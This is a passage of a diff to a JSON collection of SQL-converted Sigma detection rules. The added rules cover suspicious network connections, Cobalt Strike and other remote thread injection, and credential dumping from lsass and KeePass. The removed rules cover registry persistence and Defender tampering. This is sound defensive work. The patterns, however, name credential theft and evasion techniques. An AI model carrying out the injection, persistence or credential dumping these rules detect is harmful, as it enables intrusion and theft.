(x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "status": "test", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", - "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_file.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "author": "frack113", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId 